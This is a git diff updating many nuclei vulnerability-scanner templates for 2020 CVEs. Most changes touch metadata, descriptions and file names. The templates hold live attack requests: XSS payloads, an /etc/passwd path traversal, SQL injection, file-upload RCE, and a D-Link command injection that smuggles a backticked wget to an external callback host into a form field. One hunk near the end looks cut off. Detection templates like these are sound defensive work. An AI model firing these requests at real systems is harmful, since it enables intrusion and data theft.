a/nuclei-templates/CVE-2020/CVE-2020-24701.yaml b/nuclei-templates/CVE-2020/CVE-2020-24701.yaml index 15c5c53bba..f2bc0fc8b8 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-24701.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-24701.yaml @@ -11,13 +11,14 @@ info: - https://seclists.org/fulldisclosure/2021/Jul/33 - https://nvd.nist.gov/vuln/detail/CVE-2020-24701 - https://www.open-xchange.com + - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-24701 cwe-id: CWE-79 epss-score: 0.00818 - epss-percentile: 0.79881 + epss-percentile: 0.81463 cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +26,7 @@ info: vendor: open-xchange product: open-xchange_appsuite shodan-query: html:"Appsuite" - tags: packetstorm,seclists,cve,cve2020,appsuite,xss + tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange http: - method: GET @@ -49,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c22da59a26452418ad75f9b32de2d413d21af29d1c478d94db4887dc521a306022100c9875b8802f9c68e8264fcb91418b261e26a08f37139da09f4b11d83b113f488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2cdebb20e18eaa890cfc50613c3066fe88508ab4895439e1e93c3be8538e21e0221009989389686769e0e936f56b8d0c418beb0c14d427c1d13f1eb05dbd4f49ffacc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-24765.yaml b/nuclei-templates/CVE-2020/CVE-2020-24765.yaml index fc1618ae25..03111ee376 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-24765.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-24765.yaml @@ -1,11 +1,12 @@ id: CVE-2020-24765 + info: - name: iMind Server Information Leak + name: iMind Server Information Leak author: medbsq severity: high # https://www.cvebase.com/cve/2020/24765 requests: - - method: GET + - method: GET path: - "{{BaseURL}}/api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1" headers: @@ -14,7 +15,7 @@ requests: matchers: - type: word words: - - "This message is too large to display" + - "This message is too large to display" - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-24902.yaml b/nuclei-templates/CVE-2020/CVE-2020-24902.yaml index 718cae1181..d74e13a076 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-24902.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-24902.yaml @@ -6,27 +6,39 @@ info: severity: medium description: | Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to a patched version of Quixplorer (>=2.4.2) or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt - https://nvd.nist.gov/vuln/detail/CVE-2020-24902 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-24902 cwe-id: CWE-79 + epss-score: 0.00195 + epss-percentile: 0.56453 + cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"My Download Server" + verified: true + max-request: 1 + vendor: quixplorer_project + product: quixplorer shodan-query: http.title:"My Download Server" - verified: "true" - tags: cve,cve2020,quixplorer,xss + google-query: intitle:"My Download Server" + tags: cve,cve2020,quixplorer,xss,quixplorer_project -requests: +http: - method: GET path: - '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -44,5 +56,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/08 +# digest: 4a0a00473045022100cc3315a626f72938e1bbd0b8d6123c0a4e45d1f6f608ec22fc41d9b038f25b6d022045f6709f3c37e878675f5ea3caf6f393801ac2d1c850932a039abd8066a934a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-24903.yaml b/nuclei-templates/CVE-2020/CVE-2020-24903.yaml index 3dc77f1ae5..0768866d5e 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-24903.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-24903.yaml @@ -6,20 +6,32 @@ info: severity: medium description: | Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. + remediation: | + Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks. reference: - https://seclists.org/bugtraq/2016/Mar/104 - https://nvd.nist.gov/vuln/detail/CVE-2020-24903 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-24903 cwe-id: CWE-79 + epss-score: 0.00269 + epss-percentile: 0.67095 + cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: + verified: true + max-request: 1 + vendor: cutesoft + product: cute_editor + framework: asp.net shodan-query: http.component:"ASP.NET" - verified: "true" - tags: cve,cve2020,cuteeditor,xss,seclists + tags: cve,cve2020,cuteeditor,xss,seclists,cutesoft,asp.net -requests: +http: - method: GET path: - '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";>' @@ -41,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/08 +# digest: 4b0a004830460221008dc31b494c720948586f64df0d6c82addb71bac56f1d7b99d5b94d7c7d698c20022100fdc628af73a6fc813bb7c98900e81ba79c49b4eeafc5fe53895b55f7c2cfb055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-25506.yaml b/nuclei-templates/CVE-2020/CVE-2020-25506.yaml index 8bd7bcd242..6ce8094ff6 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-25506.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-25506.yaml @@ -1,19 +1,20 @@ id: CVE-2020-25506 + info: - name: D-Link DNS-320 Unauthenticated Remote Code Execution + name: D-Link DNS-320 - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. + description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. reference: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-25506 + tags: cve,cve2020,dlink,rce,oast,mirai classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2020-25506 cwe-id: CWE-78 - tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router + requests: - raw: - | @@ -22,14 +23,14 @@ requests: Accept: */* C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` + - | POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 Host: {{Hostname}} Accept: */* + matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/03/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-26217.yaml b/nuclei-templates/CVE-2020/CVE-2020-26217.yaml index 7b4b09fe92..bcad0d4ac7 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-26217.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-26217.yaml @@ -6,21 +6,28 @@ info: severity: high description: | XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. + remediation: Fixed in 1.4.14. reference: - https://x-stream.github.io/CVE-2020-26217.html - https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a - https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2 - https://nvd.nist.gov/vuln/detail/cve-2020-26217 - remediation: Fixed in 1.4.14. + - https://lists.apache.org/thread.html/r2de526726e7f4db4a7cb91b7355070779f51a84fd985c6529c2f4e9e@%3Cissues.activemq.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-26217 cwe-id: CWE-78 - epss-score: 0.97456 - tags: cve,cve2020,xstream,deserialization,rce,oast + epss-score: 0.97384 + epss-percentile: 0.99904 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve,cve2020,xstream,deserialization,rce,oast,xstream_project http: - raw: @@ -94,4 +101,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# Enhanced by md on 2023/04/12 +# digest: 4b0a00483046022100833148b184c9a024daabe14d4fef1a74835dd8f418140ce52d04df763175d9e8022100f65031aa40e1c23f6150f38f0f8737a2ac23a8e5c5f4cc29f48a0de92a01de3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-26248.yaml b/nuclei-templates/CVE-2020/CVE-2020-26248.yaml index 17eec9a35c..98be999570 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-26248.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-26248.yaml @@ -6,22 +6,32 @@ info: severity: high description: | PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: Fixed in 4.2.1. reference: - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html - https://packagist.org/packages/prestashop/productcomments - https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9 - https://nvd.nist.gov/vuln/detail/CVE-2020-26248 - remediation: Fixed in 4.2.1. + - https://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffa classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H cvss-score: 8.2 cve-id: CVE-2020-26248 cwe-id: CWE-89 + epss-score: 0.01617 + epss-percentile: 0.87187 + cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:* metadata: - verified: "true" - tags: cve,cve2020,sqli,prestshop,packetstorm + verified: true + max-request: 1 + vendor: prestashop + product: productcomments + framework: prestashop + tags: cve,cve2020,packetstorm,sqli,prestshop,prestashop -requests: +http: - raw: - | @timeout: 20s @@ -36,5 +46,4 @@ requests: - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and - -# Enhanced by md on 2022/12/08 +# digest: 4b0a00483046022100bfb60507528a715a3186e6f06262c9534c16003bc96c3baa4049108a3d06d67a0221008662896abf6d4938c136f30d2492fc638fb1157aea901a3875741b3251869743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-26258.yaml b/nuclei-templates/CVE-2020/CVE-2020-26258.yaml index cb31c9a409..ed2f7f7df1 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-26258.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-26258.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to data leakage or further attacks. remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher. reference: - https://x-stream.github.io/CVE-2020-26258.html @@ -18,14 +20,14 @@ info: cvss-score: 7.7 cve-id: CVE-2020-26258 cwe-id: CWE-918 - epss-score: 0.84673 - epss-percentile: 0.98181 + epss-score: 0.90088 + epss-percentile: 0.98718 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2020,xstream,ssrf,oast + tags: cve,cve2020,xstream,ssrf,oast,xstream_project http: - raw: @@ -63,4 +65,4 @@ http: part: interactsh_request words: - "User-Agent: Java" -# digest: 4a0a004730450221009c87b98d38a9ff915f6eb98ea533ad3c344880217105f459d6cba6c982645cf7022008545c4f823d634011268c5e370a16af71555efffe94632bf8b209886eb0c09b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090b286f58ae4ddf71281f47e94a6932952a067406a9d9bd4978cee28462a401b02207bc498dd31d9e55e2a847a6900d2537b77406a0208b97997e752e77bbc887dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-26919.yaml b/nuclei-templates/CVE-2020/CVE-2020-26919.yaml index f7e7ceacc4..a57eaa9237 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-26919.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-26919.yaml @@ -4,16 +4,15 @@ info: name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: "NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands." + description: NETGEAR ProSAFE Plus was found to allow any HTML page as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. reference: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-26919 + tags: cve,cve2020,netgear,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2020-26919 - tags: cve,cve2020,netgear,rce,oast,router,unauth requests: - raw: @@ -26,8 +25,6 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/03/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-27191.yaml b/nuclei-templates/CVE-2020/CVE-2020-27191.yaml index 90a5bfa054..27d923704b 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-27191.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-27191.yaml @@ -1,28 +1,45 @@ id: CVE-2020-27191 + info: - name: LionWiki 3.2.11 - LFI + name: LionWiki <3.2.12 - Local File Inclusion author: 0x_Akoko severity: high - description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion. + description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. + remediation: | + Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability. reference: - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi - http://lionwiki.0o.cz/index.php?page=Main+page - - https://www.cvedetails.com/cve/CVE-2020-27191 + - https://nvd.nist.gov/vuln/detail/CVE-2020-27191 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-27191 cwe-id: CWE-22 - tags: cve,cve2020,lionwiki,lfi,oss -requests: + epss-score: 0.01572 + epss-percentile: 0.86986 + cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: lionwiki + product: lionwiki + tags: cve2020,cve,lionwiki,lfi,oss + +http: - method: GET path: - "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0:" + - type: status status: - 200 +# digest: 480a00453043022024fd9eabd5990697a1c0d513e268964dba7e4032104e676f2c1516f0d7bf1e6c021f01979b841bd595af2324f5a4beea443729213ab4e816a2f27b4f681dfe71ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-2733.yaml b/nuclei-templates/CVE-2020/CVE-2020-2733.yaml index fbfa6a0b1e..e7a2ec4233 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-2733.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-2733.yaml @@ -6,20 +6,32 @@ info: severity: critical description: | JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://redrays.io/cve-2020-2733-jd-edwards/ - https://www.oracle.com/security-alerts/cpuapr2020.html - https://nvd.nist.gov/vuln/detail/CVE-2020-2733 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2733 + epss-score: 0.29301 + epss-percentile: 0.96779 + cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: oracle + product: jd_edwards_enterpriseone_tools shodan-query: port:8999 product:"Oracle WebLogic Server" - verified: "true" - tags: cve,cve2020,oracle,weblogic,disclosure,exposure + tags: cve2020,cve,oracle,weblogic,disclosure,exposure -requests: +http: - method: GET path: - '{{BaseURL}}/manage/fileDownloader?sec=1' @@ -39,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/01 +# digest: 4a0a0047304502202fa8f3f605bced9c2bff8bd71dfd1b657c7806b31db0da37ba79f848736c0448022100b028c9c54f50d73729aa0630e94a3a90f88663ee769dae3762ef6b64d4da2dd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-27361.yaml b/nuclei-templates/CVE-2020/CVE-2020-27361.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-27361.yaml rename to nuclei-templates/CVE-2020/CVE-2020-27361.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-27481.yaml b/nuclei-templates/CVE-2020/CVE-2020-27481.yaml index 4547d60b45..83c85522de 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-27481.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-27481.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-27481 cwe-id: CWE-89 - epss-score: 0.10572 - epss-percentile: 0.94453 + epss-score: 0.12857 + epss-percentile: 0.94961 cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: goodlayers product: good_learning_management_system framework: wordpress - tags: goodlayerslms,sqli,wpscan,cve,cve2020 + tags: cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress http: - raw: @@ -44,4 +46,4 @@ http: - "status_code == 200" - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')" condition: and -# digest: 4a0a00473045022100f9c562bf980df2c173e1dde5a411b8da9a2b8f1ceecd21047c28a6ffa8d7aaf6022036fe5740e488b87335f6f3072726a45157cefa450e380fe3c2f1c979b87ff9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100838e205274d6592ebebcc4ab9b689fd6d05ec245b61cb0f69cff831152ea32dd02203fc10829d7d36c26e62df66914a28f76aea1fb34c5f7162abe66805dbf74f212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-28185.yaml b/nuclei-templates/CVE-2020/CVE-2020-28185.yaml index 305c9a9c91..7d8080615c 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-28185.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-28185.yaml @@ -4,44 +4,56 @@ info: name: TerraMaster TOS < 4.2.06 - User Enumeration author: pussycat0x severity: medium + description: | + User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. + impact: | + An attacker can enumerate valid usernames, potentially aiding in further attacks. + remediation: | + Upgrade TerraMaster TOS to version 4.2.06 or later. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md - https://nvd.nist.gov/vuln/detail/CVE-2020-28185 + - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ + - https://www.terra-master.com/ + - https://github.com/ArrestX/--POC + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2020-28185 + epss-score: 0.00465 + epss-percentile: 0.74945 + cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 2 + vendor: terra-master + product: tos fofa-query: '"TerraMaster" && header="TOS"' - tags: tamronos,enum + tags: cve2020,cve,terramaster,enum,tos,terra-master http: - raw: - | GET /tos/index.php?user/login HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - - | POST /wizard/initialise.php HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - Referer: {{BaseURL}}/tos/index.php?user/login + Referer: {{RootURL}}/tos/index.php?user/login tab=checkuser&username=admin - cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - - "username" - - "email" - - "status" + - '"username":' + - '"email":' + - '"status":' condition: and - type: status @@ -53,4 +65,5 @@ http: part: body_2 regex: - '"username":"(.*?)"' - - '"email":"(.*?)"' \ No newline at end of file + - '"email":"(.*?)"' +# digest: 4b0a0048304602210083f16f101ac090f5d7e921131e73a027f6009fff40f89865c434db95593638b7022100a606966b55e981d57fde6523d60dc96e82d5cdc44a754742dac2b5268a081294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-28188.yaml b/nuclei-templates/CVE-2020/CVE-2020-28188.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-28188.yaml rename to nuclei-templates/CVE-2020/CVE-2020-28188.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-28208.yaml b/nuclei-templates/CVE-2020/CVE-2020-28208.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-28208.yaml rename to nuclei-templates/CVE-2020/CVE-2020-28208.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-28351.yaml b/nuclei-templates/CVE-2020/CVE-2020-28351.yaml deleted file mode 100644 index b86c4fe505..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-28351.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2020-28351 -info: - name: ShoreTel 19.46.1802.0 XSS - author: pikpikcu - severity: medium - description: conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page - reference: - - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 - tags: cve,cve2020,shoretel,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-28351 - cwe-id: CWE-79 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME" - headers: - Content-Type: application/x-www-form-urlencoded - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: word - words: - - 'Content-Type: text/html' - part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-28871.yaml b/nuclei-templates/CVE-2020/CVE-2020-28871.yaml index abb78584a7..8520809f13 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-28871.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-28871.yaml @@ -1,19 +1,21 @@ id: CVE-2020-28871 + info: name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. + description: This template detects a remote code execution (RCE) vulnerability in Monitorr 1.7.6m. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. reference: - - https://www.exploit-db.com/exploits/48980 - - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 + - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ + - https://www.exploit-db.com/exploits/48980 + tags: cve,cve2020,monitorr,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2020-28871 cwe-id: CWE-434 - tags: cve,cve2020,monitorr,rce,oast,unauth + requests: - raw: - | @@ -35,13 +37,13 @@ requests: GIF89a213213123WMT Server playout" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-35476.yaml b/nuclei-templates/CVE-2020/CVE-2020-35476.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35476.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35476.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35580.yaml b/nuclei-templates/CVE-2020/CVE-2020-35580.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35580.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35580.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35598.yaml b/nuclei-templates/CVE-2020/CVE-2020-35598.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35598.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35598.yaml 